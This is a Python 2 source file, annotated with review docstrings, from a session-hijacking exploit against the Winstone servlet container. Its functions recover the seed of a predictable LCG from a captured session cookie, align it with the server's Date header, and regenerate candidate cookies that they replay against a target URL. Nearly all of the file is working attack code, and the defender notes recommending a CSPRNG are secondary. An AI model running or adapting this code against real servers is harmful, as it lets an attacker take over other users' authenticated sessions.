def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str):
    """Replay candidate session cookies listed in *sessionsFileName* against *url*.

    Each line of the file is expected to be ``cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt``
    (comma separated; see the unpacking below). For every entry the cookie value is
    rebuilt as MD5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + prngOutput),
    i.e. the session identifier is derived from a timestamp plus the output of a
    seeded LCG (``JavaLCGMimic``, defined elsewhere) rather than from a CSPRNG -- that
    predictability is the weakness this routine demonstrates. The mitigation on the
    server side is to issue session identifiers from a cryptographically secure random
    source with enough entropy that no timestamp/seed reconstruction is possible.

    NOTE(review): this source was recovered from a single collapsed line; the block
    structure, in particular that ``seek += 1`` sits inside the ``if``, was reconstructed
    and should be confirmed against the original file. The file is Python 2 syntax
    (``print`` statements, ``str`` passed to ``hashlib``).

    Side effects: one HTTP probe per candidate via ``isCookieValid`` (project helper,
    not visible here) and a ``print`` for each accepted cookie. From a defender's view
    this phase is a burst of requests from one source carrying many distinct, mostly
    invalid session cookies -- a useful detection signal. Returns ``None``.
    """
    # Handle is never closed (no with-statement / f.close()); relies on GC.
    f = open(sessionsFileName,"r")
    while True:
        line = f.readline().replace("\n","")
        # readline() returns "" only at EOF, so a blank line in the middle of the
        # file would also terminate the loop here.
        if line == "":
            break
        (cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt) = line.split(",")
        timeMillisMin = int(timeMillisMin)
        timeMillisMax = int(timeMillisMax)
        PRNGseed = int(PRNGseed)
        sessionCnt = int(sessionCnt)
        # seek = how many LCG outputs to draw before using the last one; 1-based.
        seek = 1
        for tryMillis in range(timeMillisMin,timeMillisMax):
            if seek > sessionCnt:
                break
            # Fresh generator every iteration, reset to the recovered seed, then
            # advanced `seek` steps -- O(seek) per candidate millisecond.
            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            for i in range(seek):
                PRNGout = g.nextLong()
            md5dig = hashlib.md5()
            md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(tryMillis)+str(PRNGout))
            cookieToTry = md5dig.hexdigest()
            if isCookieValid(url,cookieName+"="+cookieToTry,success_str):
                print "[!!!] Found valid cookie:",cookieName+"="+cookieToTry
                # Only advances to the next PRNG output once a cookie is accepted
                # (as reconstructed; see NOTE above).
                seek += 1
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
    """Worker that searches for the LCG seed reproducing a captured *cookie*.

    NOTE(review): this definition is shadowed by the second ``recoverPRNGStateWorker``
    defined later in the file; at import time only the later one survives, so this
    body is dead code. Kept as documented history.

    Work items are ``(PRNGMillisMin, PRNGMillisMax, PRNGseek)`` tuples taken from
    *workQueue*; the item is immediately re-queued with ``PRNGseek + 1`` so other
    workers cover deeper positions in the generator's output. For each candidate
    seed millisecond the LCG is advanced ``PRNGseek`` steps and the cookie hash
    MD5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + prngOutput) is
    recomputed over a window of creation timestamps. On a match the seed is written
    to *seedValue* (shared value with a ``.value`` attribute; presumably a
    ``multiprocessing.Value`` -- confirm) so all workers stop.

    Relies on module globals ``PRNGseekMax`` (search depth cap) and ``timeMillisDelay``
    (how far before the estimate the window starts); neither is defined in this block.

    Returns 0 when a seed is found or already known, -1 when the depth cap is hit.
    ``workQueue.get(block=False)`` raises ``Queue.Empty`` unhandled if the queue is
    drained -- the later redefinition addresses that.
    """
    global PRNGseekMax
    global timeMillisDelay
    while True:
        # Another worker already recovered the seed; nothing left to do.
        if seedValue.value != 0:
            return 0
        (PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(block=False)
        # Re-queue the same range one position deeper so the pool keeps going
        # while this worker handles the current depth.
        workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1))
        if PRNGseek > PRNGseekMax:
            return -1
        for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax):
            #if seedValue.value != 0:
            #return 0
            g = JavaLCGMimic(PRNGMillis)
            PRNGout = -1
            for s in range(PRNGseek):
                PRNGout = g.nextLong()
            # Window: [estimate - timeMillisDelay, estimate + 1000) milliseconds.
            for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000):
                md5dig = hashlib.md5()
                md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
                if md5dig.hexdigest() == cookie:
                    # `g.seed` is an attribute of the project's JavaLCGMimic; not visible here.
                    seedValue.value = g.seed
                    return 0
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
    """Worker that searches for the LCG seed reproducing a captured *cookie*.

    Effective definition: it replaces the earlier function of the same name in this
    file. Differences from that version are a 1-second ``get(timeout=1)`` with
    ``TQ.Empty`` handling (``TQ`` is presumably the imported ``Queue`` module --
    confirm), diagnostic prints, and returning ``None`` instead of -1 at the depth cap.

    Work items are ``(PRNGMillisMin, PRNGMillisMax, PRNGseek)`` tuples; each is
    re-queued with ``PRNGseek + 1`` before being processed. For every candidate seed
    millisecond in the range the generator is advanced ``PRNGseek`` steps and
    MD5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + prngOutput) is
    compared with *cookie* over a window of creation timestamps. On a match the seed
    is stored in ``seedValue.value`` and the worker returns 0.

    Uses module globals ``PRNGseekMax`` and ``timeMillisDelay`` (defined elsewhere).
    This is the offline part of the weakness: a session id built from a timestamp
    and an LCG output can be reversed with CPU time alone, which is why session
    identifiers must come from a CSPRNG.
    """
    global PRNGseekMax
    global timeMillisDelay
    while True:
        # Stop as soon as any worker has published a seed.
        if seedValue.value != 0:
            return 0
        (PRNGMillisMin,PRNGMillisMax,PRNGseek) = (None,None,None)
        try:
            (PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(timeout=1)
        except TQ.Empty:
            print "[!] Queue is EMPTY"
            return
        # Defensive: only reachable if get() returned a tuple containing None.
        if PRNGMillisMin == None:
            print "[!] Cannot read from queue"
            return
        # Hand the same range, one position deeper, back to the pool.
        workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1))
        if PRNGseek > PRNGseekMax:
            return
        for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax):
            g = JavaLCGMimic(PRNGMillis)
            PRNGout = -1
            for s in range(PRNGseek):
                PRNGout = g.nextLong()
            # Window: [estimate - timeMillisDelay, estimate + 1000) milliseconds.
            for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000):
                md5dig = hashlib.md5()
                md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
                if md5dig.hexdigest() == cookie:
                    print "[*] Found PRNGMillis =",PRNGMillis
                    print "[*] Found timeMillis =",timeMillis
                    # `g.seed` comes from the project's JavaLCGMimic class.
                    seedValue.value = g.seed
                    return 0
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone):
    """Align a freshly issued cookie with a known *PRNGseed* and the server clock.

    Fetches one cookie via ``givemecookie`` (project helper; appears to return a
    sequence whose first element is ``name=value`` and whose last element is an
    HTTP ``Date``-style string -- confirm), converts that date to seconds in the
    given *timezone*, then for increasing ``PRNGseek`` draws that many outputs
    from a generator reset to *PRNGseed* and checks whether
    MD5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + prngOutput)
    matches the cookie for some millisecond in
    ``[timeSecs*1000 - timeMillisDelay, timeSecs*1000 + 1000)``.

    Returns ``(timeMillis, seed, PRNGseek)`` on a match, ``None`` if no cookie could be
    obtained or ``PRNGseek`` exceeds the module global ``PRNGseekMax``. Also reads the
    module global ``timeMillisDelay``. ``CookieName`` is declared global but not used
    in this body. Depends on ``pytz`` and on ``time``/``datetime`` imported elsewhere.

    Defender note: the reason this alignment works is that the server's session
    identifier is a deterministic function of its clock and of an LCG state; the
    fix is a CSPRNG-generated identifier, which also removes the need to hide
    the ``Date`` header.
    """
    global CookieName
    global PRNGseekMax
    global timeMillisDelay
    t = givemecookie(url)
    if t == None:
        return
    cookie = t[0].split('=')[-1]
    # Parse an RFC-1123 style date (e.g. the HTTP Date header) into local time.
    st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z')
    dt = datetime.fromtimestamp(time.mktime(st))
    # Treat the parsed value as UTC and re-express it in the target timezone;
    # NOTE(review): mktime() on the shifted timetuple applies the local offset
    # again, so `timeSecs` depends on the host's own timezone -- confirm intent.
    dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone))
    timeSecs = int(time.mktime(dt.timetuple()))
    PRNGseek = 1
    while True:
        if PRNGseek > PRNGseekMax:
            break
        # Reset to the known seed and advance PRNGseek outputs (O(PRNGseek) each round).
        g = JavaLCGMimic(0)
        g.forceSeed(PRNGseed)
        PRNGout = -1
        for s in range(PRNGseek):
            PRNGout = g.nextLong()
        for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000):
            md5dig = hashlib.md5()
            md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
            if md5dig.hexdigest() == cookie:
                print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek
                # `g.seed` is exposed by the project's JavaLCGMimic class.
                return (timeMillis,g.seed,PRNGseek)
        PRNGseek += 1